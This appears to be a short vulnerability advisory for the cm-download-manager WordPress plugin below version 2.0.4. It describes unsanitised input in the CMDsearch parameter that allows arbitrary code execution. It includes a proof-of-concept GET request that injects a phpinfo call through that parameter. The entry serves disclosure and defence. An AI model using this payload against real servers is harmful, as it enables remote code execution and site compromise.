The plugin does not validate and sanitise the CMDsearch parameter which used to create a custom function. This allows attacker to run arbitrary command on the remote server
GET /cmdownloads/?CMDsearch=“.phpinfo().” HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive
CPE | Name | Operator | Version |
---|---|---|---|
cm-download-manager | lt | 2.0.4 |